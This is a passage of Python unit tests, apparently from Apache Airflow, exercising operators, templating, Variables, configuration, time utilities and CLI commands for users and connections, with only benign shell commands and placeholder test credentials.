self.assertNotEqual(hash(dag_subclass), hash(self.dag))
def test_check_operators(self):
conn_id = "sqlite_default"
captainHook = BaseHook.get_hook(conn_id=conn_id)
captainHook.run("CREATE TABLE operator_test_table (a, b)")
captainHook.run("insert into operator_test_table values (1,2)")
t = CheckOperator(
task_id='check',
sql="select count(*) from operator_test_table",
conn_id=conn_id,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
t = ValueCheckOperator(
task_id='value_check',
pass_value=95,
tolerance=0.1,
conn_id=conn_id,
sql="SELECT 100",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
captainHook.run("drop table operator_test_table")
def test_clear_api(self):
task = self.dag_bash.tasks[0]
task.clear(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
upstream=True, downstream=True)
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.are_dependents_done()
def test_illegal_args(self):
"""
Tests that Operators reject illegal arguments
"""
with warnings.catch_warnings(record=True) as w:
t = BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
self.assertTrue(
issubclass(w[0].category, PendingDeprecationWarning))
self.assertIn(
'Invalid arguments were passed to BashOperator.',
w[0].message.args[0])
def test_bash_operator(self):
t = BashOperator(
task_id='test_bash_operator',
bash_command="echo success",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_multi_byte_output(self):
t = BashOperator(
task_id='test_multi_byte_bash_operator',
bash_command=u"echo \u2600",
dag=self.dag,
output_encoding='utf-8')
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_kill(self):
import psutil
sleep_time = "100%d" % os.getpid()
t = BashOperator(
task_id='test_bash_operator_kill',
execution_timeout=timedelta(seconds=1),
bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
sleep(2)
pid = -1
for proc in psutil.process_iter():
if proc.cmdline() == ['sleep', sleep_time]:
pid = proc.pid
if pid != -1:
os.kill(pid, signal.SIGTERM)
self.fail("BashOperator's subprocess still running after stopping on timeout!")
def test_trigger_dagrun(self):
def trigga(context, obj):
if True:
return obj
t = TriggerDagRunOperator(
task_id='test_trigger_dagrun',
trigger_dag_id='example_bash_operator',
python_callable=trigga,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_dryrun(self):
t = BashOperator(
task_id='test_dryrun',
bash_command="echo success",
dag=self.dag)
t.dry_run()
def test_sqlite(self):
import airflow.operators.sqlite_operator
t = airflow.operators.sqlite_operator.SqliteOperator(
task_id='time_sqlite',
sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_timeout(self):
t = PythonOperator(
task_id='test_timeout',
execution_timeout=timedelta(seconds=1),
python_callable=lambda: sleep(5),
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_python_op(self):
def test_py_op(templates_dict, ds, **kwargs):
if not templates_dict['ds'] == ds:
raise Exception("failure")
t = PythonOperator(
task_id='test_py_op',
provide_context=True,
python_callable=test_py_op,
templates_dict={'ds': "{{ ds }}"},
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_complex_template(self):
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field['bar'][1],
context['ds'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field={
'foo': '123',
'bar': ['baz', '{{ ds }}']
},
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_variable(self):
"""
Test the availability of variables in templates
"""
val = {
'test_value': 'a test value'
}
Variable.set("a_variable", val['test_value'])
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable(self):
"""
Test the availability of variables (serialized as JSON) in templates
"""
val = {
'test_value': {'foo': 'bar', 'obj': {'v1': 'yes', 'v2': 'no'}}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value']['obj']['v2'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.json.a_variable.obj.v2 }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable_as_value(self):
"""
Test the availability of variables (serialized as JSON) in templates, but
accessed as a value
"""
val = {
'test_value': {'foo': 'bar'}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
u'{"foo": "bar"}')
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_non_bool(self):
"""
Test templates can handle objects with no sense of truthiness
"""
class NonBoolObject(object):
def __len__(self):
return NotImplemented
def __bool__(self):
return NotImplemented
t = OperatorSubclass(
task_id='test_bad_template_obj',
some_templated_field=NonBoolObject(),
dag=self.dag)
t.resolve_template_files()
def test_import_examples(self):
self.assertEqual(len(self.dagbag.dags), NUM_EXAMPLE_DAGS)
def test_local_task_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(task_instance=ti, ignore_ti_state=True)
job.run()
def test_raw_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
def test_doctests(self):
modules = [utils, macros]
for mod in modules:
failed, tests = doctest.testmod(mod)
if failed:
raise Exception("Failed a doctest")
def test_variable_set_get_round_trip(self):
Variable.set("tested_var_set_id", "Monday morning breakfast")
self.assertEqual("Monday morning breakfast", Variable.get("tested_var_set_id"))
def test_variable_set_get_round_trip_json(self):
value = {"a": 17, "b": 47}
Variable.set("tested_var_set_id", value, serialize_json=True)
self.assertEqual(value, Variable.get("tested_var_set_id", deserialize_json=True))
def test_get_non_existing_var_should_return_default(self):
default_value = "some default val"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value))
def test_get_non_existing_var_should_not_deserialize_json_default(self):
default_value = "}{ this is a non JSON default }{"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value,
deserialize_json=True))
def test_variable_setdefault_round_trip(self):
key = "tested_var_setdefault_1_id"
value = "Monday morning breakfast in Paris"
Variable.setdefault(key, value)
self.assertEqual(value, Variable.get(key))
def test_variable_setdefault_round_trip_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.setdefault(key, value, deserialize_json=True)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_setdefault_existing_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.set(key, value, serialize_json=True)
val = Variable.setdefault(key, value, deserialize_json=True)
# Check the returned value, and the stored value are handled correctly.
self.assertEqual(value, val)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_parameterized_config_gen(self):
cfg = configuration.parameterized_config(configuration.DEFAULT_CONFIG)
# making sure some basic building blocks are present:
self.assertIn("[core]", cfg)
self.assertIn("dags_folder", cfg)
self.assertIn("sql_alchemy_conn", cfg)
self.assertIn("fernet_key", cfg)
# making sure replacement actually happened
self.assertNotIn("{AIRFLOW_HOME}", cfg)
self.assertNotIn("{FERNET_KEY}", cfg)
def test_config_use_original_when_original_and_fallback_are_present(self):
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
configuration.conf.set("core", "FERNET_KEY_CMD", "printf HELLO")
FALLBACK_FERNET_KEY = configuration.conf.get(
"core",
"FERNET_KEY"
)
self.assertEqual(FERNET_KEY, FALLBACK_FERNET_KEY)
# restore the conf back to the original state
configuration.conf.remove_option("core", "FERNET_KEY_CMD")
def test_config_throw_error_when_original_and_fallback_is_absent(self):
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.conf.get("core", "FERNET_KEY")
configuration.conf.remove_option("core", "FERNET_KEY")
with self.assertRaises(AirflowConfigException) as cm:
configuration.conf.get("core", "FERNET_KEY")
exception = str(cm.exception)
message = "section/key [core/fernet_key] not found in config"
self.assertEqual(message, exception)
# restore the conf back to the original state
configuration.conf.set("core", "FERNET_KEY", FERNET_KEY)
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
def test_config_override_original_when_non_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = "some value"
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_config_override_original_when_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = ""
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_round_time(self):
rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)
rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)
rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)
rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)
rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)
rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)
def test_infer_time_unit(self):
self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))
self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))
self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))
self.assertEqual('days', infer_time_unit([200000, 100000]))
def test_scale_time_units(self):
# use assert_almost_equal from numpy.testing since we are comparing
# floating point arrays
arr1 = scale_time_units([130, 5400, 10], 'minutes')
assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)
arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)
arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
decimal=3)
arr4 = scale_time_units([200000, 100000], 'days')
assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)
def test_duplicate_dependencies(self):
regexp = "Dependency (.*)runme_0(.*)run_after_loop(.*) " \
"already registered"
with self.assertRaisesRegexp(AirflowException, regexp):
self.runme_0.set_downstream(self.run_after_loop)
with self.assertRaisesRegexp(AirflowException, regexp):
self.run_after_loop.set_upstream(self.runme_0)
def test_bad_trigger_rule(self):
with self.assertRaises(AirflowException):
DummyOperator(
task_id='test_bad_trigger',
trigger_rule="non_existant",
dag=self.dag)
def test_terminate_task(self):
"""If a task instance's db state get deleted, it should fail"""
TI = models.TaskInstance
dag = self.dagbag.dags.get('test_utils')
task = dag.task_dict.get('sleeps_forever')
ti = TI(task=task, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(
task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Running task instance asynchronously
p = multiprocessing.Process(target=job.run)
p.start()
sleep(5)
settings.engine.dispose()
session = settings.Session()
ti.refresh_from_db(session=session)
# making sure it's actually running
self.assertEqual(State.RUNNING, ti.state)
ti = session.query(TI).filter_by(
dag_id=task.dag_id,
task_id=task.task_id,
execution_date=DEFAULT_DATE
).one()
# deleting the instance should result in a failure
session.delete(ti)
session.commit()
# waiting for the async task to finish
p.join()
# making sure that the task ended up as failed
ti.refresh_from_db(session=session)
self.assertEqual(State.FAILED, ti.state)
session.close()
def test_task_fail_duration(self):
"""If a task fails, the duration should be recorded in TaskFail"""
p = BashOperator(
task_id='pass_sleepy',
bash_command='sleep 3',
dag=self.dag)
f = BashOperator(
task_id='fail_sleepy',
bash_command='sleep 5',
execution_timeout=timedelta(seconds=3),
retry_delay=timedelta(seconds=0),
dag=self.dag)
session = settings.Session()
try:
p.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except:
pass
try:
f.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except:
pass
p_fails = session.query(models.TaskFail).filter_by(
task_id='pass_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
f_fails = session.query(models.TaskFail).filter_by(
task_id='fail_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
print(f_fails)
self.assertEqual(0, len(p_fails))
self.assertEqual(1, len(f_fails))
        # the failed task should have run for at least its 3 second execution timeout
self.assertGreaterEqual(sum([f.duration for f in f_fails]), 3)
def test_dag_stats(self):
"""Correctly sets/dirties/cleans rows of DagStat table"""
session = settings.Session()
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
models.DagStat.update([], session=session)
run1 = self.dag_bash.create_dagrun(
run_id="run1",
execution_date=DEFAULT_DATE,
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 1)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
run2 = self.dag_bash.create_dagrun(
run_id="run2",
execution_date=DEFAULT_DATE + timedelta(days=1),
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 2)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
session.query(models.DagRun).first().state = State.SUCCESS
session.commit()
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.SUCCESS).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.SUCCESS, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.RUNNING).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.RUNNING, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
session.close()
def test_run_command(self):
if six.PY3:
write = r'sys.stdout.buffer.write("\u1000foo".encode("utf8"))'
else:
write = r'sys.stdout.write(u"\u1000foo".encode("utf8"))'
cmd = 'import sys; {0}; sys.stdout.flush()'.format(write)
self.assertEqual(run_command("python -c '{0}'".format(cmd)),
u'\u1000foo' if six.PY3 else 'foo')
self.assertEqual(run_command('echo "foo bar"'), u'foo bar\n')
self.assertRaises(AirflowConfigException, run_command, 'bash -c "exit 1"')
def test_trigger_dagrun_with_execution_date(self):
utc_now = timezone.utcnow()
run_id = 'trig__' + utc_now.isoformat()
def payload_generator(context, object):
object.run_id = run_id
return object
task = TriggerDagRunOperator(task_id='test_trigger_dagrun_with_execution_date',
trigger_dag_id='example_bash_operator',
python_callable=payload_generator,
execution_date=utc_now,
dag=self.dag)
task.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
dag_runs = models.DagRun.find(dag_id='example_bash_operator',
run_id=run_id)
        self.assertEqual(len(dag_runs), 1)
dag_run = dag_runs[0]
        self.assertEqual(dag_run.execution_date, utc_now)
class CliTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(CliTests, cls).setUpClass()
cls._cleanup()
def setUp(self):
super(CliTests, self).setUp()
from airflow.www_rbac import app as application
configuration.load_test_config()
self.app, self.appbuilder = application.create_app(session=Session, testing=True)
self.app.config['TESTING'] = True
self.parser = cli.CLIFactory.get_parser()
self.dagbag = models.DagBag(dag_folder=DEV_NULL, include_examples=True)
settings.configure_orm()
self.session = Session
def tearDown(self):
self._cleanup(session=self.session)
super(CliTests, self).tearDown()
@staticmethod
def _cleanup(session=None):
if session is None:
session = Session()
session.query(models.Pool).delete()
session.query(models.Variable).delete()
session.commit()
session.close()
def test_cli_list_dags(self):
args = self.parser.parse_args(['list_dags', '--report'])
cli.list_dags(args)
def test_cli_list_dag_runs(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator', ]))
args = self.parser.parse_args(['list_dag_runs',
'example_bash_operator',
'--no_backfill'])
cli.list_dag_runs(args)
def test_cli_create_user_random_password(self):
args = self.parser.parse_args([
'create_user', '-u', 'test1', '-l', 'doe', '-f', 'jon',
'-e', 'jdoe@foo.com', '-r', 'Viewer', '--use_random_password'
])
cli.create_user(args)
def test_cli_create_user_supplied_password(self):
args = self.parser.parse_args([
'create_user', '-u', 'test2', '-l', 'doe', '-f', 'jon',
'-e', 'jdoe@apache.org', '-r', 'Viewer', '-p', 'test'
])
cli.create_user(args)
def test_cli_delete_user(self):
args = self.parser.parse_args([
'create_user', '-u', 'test3', '-l', 'doe', '-f', 'jon',
'-e', 'jdoe@example.com', '-r', 'Viewer', '--use_random_password'
])
cli.create_user(args)
args = self.parser.parse_args([
'delete_user', '-u', 'test3',
])
cli.delete_user(args)
def test_cli_list_users(self):
for i in range(0, 3):
args = self.parser.parse_args([
'create_user', '-u', 'user{}'.format(i), '-l', 'doe', '-f', 'jon',
'-e', 'jdoe+{}@gmail.com'.format(i), '-r', 'Viewer',
'--use_random_password'
])
cli.create_user(args)
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.list_users(self.parser.parse_args(['list_users']))
stdout = mock_stdout.getvalue()
for i in range(0, 3):
self.assertIn('user{}'.format(i), stdout)
def test_cli_sync_perm(self):
# test whether sync_perm cli will throw exceptions or not
args = self.parser.parse_args([
'sync_perm'
])
cli.sync_perm(args)
def test_cli_list_tasks(self):
for dag_id in self.dagbag.dags.keys():
args = self.parser.parse_args(['list_tasks', dag_id])
cli.list_tasks(args)
args = self.parser.parse_args([
'list_tasks', 'example_bash_operator', '--tree'])
cli.list_tasks(args)
@mock.patch("airflow.bin.cli.db_utils.initdb")
def test_cli_initdb(self, initdb_mock):
cli.initdb(self.parser.parse_args(['initdb']))
initdb_mock.assert_called_once_with(False)
@mock.patch("airflow.bin.cli.db_utils.resetdb")
def test_cli_resetdb(self, resetdb_mock):
cli.resetdb(self.parser.parse_args(['resetdb', '--yes']))
resetdb_mock.assert_called_once_with(False)
def test_cli_connections_list(self):
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(['connections', '--list']))
stdout = mock_stdout.getvalue()
            conns = [[x.strip("'") for x in re.findall(r"'\w+'", line)[:2]]
for ii, line in enumerate(stdout.split('\n'))
if ii % 2 == 1]
conns = [conn for conn in conns if len(conn) > 0]
# Assert that some of the connections are present in the output as
# expected:
self.assertIn(['aws_default', 'aws'], conns)
self.assertIn(['beeline_default', 'beeline'], conns)
self.assertIn(['emr_default', 'emr'], conns)
self.assertIn(['mssql_default', 'mssql'], conns)
self.assertIn(['mysql_default', 'mysql'], conns)
self.assertIn(['postgres_default', 'postgres'], conns)
self.assertIn(['wasb_default', 'wasb'], conns)
self.assertIn(['segment_default', 'segment'], conns)
# Attempt to list connections with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--list', '--conn_id=fake', '--conn_uri=fake-uri',
'--conn_type=fake-type', '--conn_host=fake_host',
'--conn_login=fake_login', '--conn_password=fake_password',
'--conn_schema=fake_schema', '--conn_port=fake_port', '--conn_extra=fake_extra']))
stdout = mock_stdout.getvalue()
# Check list attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--list flag: ['conn_id', 'conn_uri', 'conn_extra', " +
"'conn_type', 'conn_host', 'conn_login', " +
"'conn_password', 'conn_schema', 'conn_port']"),
])
def test_cli_connections_list_redirect(self):
cmd = ['airflow', 'connections', '--list']
with tempfile.TemporaryFile() as fp:
p = subprocess.Popen(cmd, stdout=fp)
p.wait()
self.assertEqual(0, p.returncode)
def test_cli_connections_add_delete(self):
# Add connections:
uri = 'postgresql://airflow:airflow@host:5432/airflow'
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new2',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new3',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new4',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new5',
'--conn_type=hive_metastore', '--conn_login=airflow',
'--conn_password=airflow', '--conn_host=host',
'--conn_port=9083', '--conn_schema=airflow']))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new6',
'--conn_uri', "", '--conn_type=google_cloud_platform', '--conn_extra', "{'extra': 'yes'}"]))
stdout = mock_stdout.getvalue()
# Check addition stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tSuccessfully added `conn_id`=new1 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new2 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new3 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new4 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new5 : " +
"hive_metastore://airflow:airflow@host:9083/airflow"),
("\tSuccessfully added `conn_id`=new6 : " +
"google_cloud_platform://:@:")
])
# Attempt to add duplicate
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tA connection with `conn_id`=new1 already exists",
])
# Attempt to add without providing conn_id
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_id']"),
])
# Attempt to add without providing conn_uri
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new']))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_uri or conn_type']"),
])
# Prepare to add connections
session = settings.Session()
extra = {'new1': None,
'new2': None,
'new3': "{'extra': 'yes'}",
'new4': "{'extra': 'yes'}"}
# Add connections
for index in range(1, 6):
conn_id = 'new%s' % index
result = (session
.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
result = (result.conn_id, result.conn_type, result.host,
result.port, result.get_extra())
if conn_id in ['new1', 'new2', 'new3', 'new4']:
self.assertEqual(result, (conn_id, 'postgres', 'host', 5432,
extra[conn_id]))
elif conn_id == 'new5':
self.assertEqual(result, (conn_id, 'hive_metastore', 'host',
9083, None))
elif conn_id == 'new6':
self.assertEqual(result, (conn_id, 'google_cloud_platform',
None, None, "{'extra': 'yes'}"))
# Delete connections
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new1']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new2']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new3']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new4']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new5']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new6']))
stdout = mock_stdout.getvalue()
# Check deletion stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tSuccessfully deleted `conn_id`=new1",
"\tSuccessfully deleted `conn_id`=new2",
"\tSuccessfully deleted `conn_id`=new3",
"\tSuccessfully deleted `conn_id`=new4",
"\tSuccessfully deleted `conn_id`=new5",
"\tSuccessfully deleted `conn_id`=new6"
])
# Check deletions
for index in range(1, 7):
conn_id = 'new%s' % index
result = (session.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
self.assertTrue(result is None)
        # Attempt to delete a non-existing connection
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tDid not find a connection with `conn_id`=fake",
])
# Attempt to delete with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake',
'--conn_uri=%s' % uri, '--conn_type=fake-type']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--delete flag: ['conn_uri', 'conn_type']"),
])
session.close()
def test_cli_test(self):
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0', '--dry_run',
DEFAULT_DATE.isoformat()]))
def test_cli_test_with_params(self):
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'also_run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
def test_cli_run(self):
cli.run(self.parser.parse_args([
'run', 'example_bash_operator', 'runme_0', '-l',
DEFAULT_DATE.isoformat()]))
def test_task_state(self):
cli.task_state(self.parser.parse_args([
'task_state', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
def test_dag_state(self):
self.assertEqual(None, cli.dag_state(self.parser.parse_args([
'dag_state', 'example_bash_operator', DEFAULT_DATE.isoformat()])))
def test_pause(self):
args = self.parser.parse_args([
'pause', 'example_bash_operator'])
cli.pause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [True, 1])
args = self.parser.parse_args([
'unpause', 'example_bash_operator'])
cli.unpause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [False, 0])
def test_subdag_clear(self):
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm'])
cli.clear(args)
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm', '--exclude_subdags'])
cli.clear(args)
def test_get_dags(self):
dags = cli.get_dags(self.parser.parse_args(['clear', 'example_subdag_operator', '-c']))
self.assertEqual(len(dags), 1)
dags = cli.get_dags(self.parser.parse_args(['clear', 'subdag', '-dx', '-c']))
self.assertGreater(len(dags), 1)
with self.assertRaises(AirflowException):
cli.get_dags(self.parser.parse_args(['clear', 'foobar', '-dx', '-c']))
def test_backfill(self):
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator',
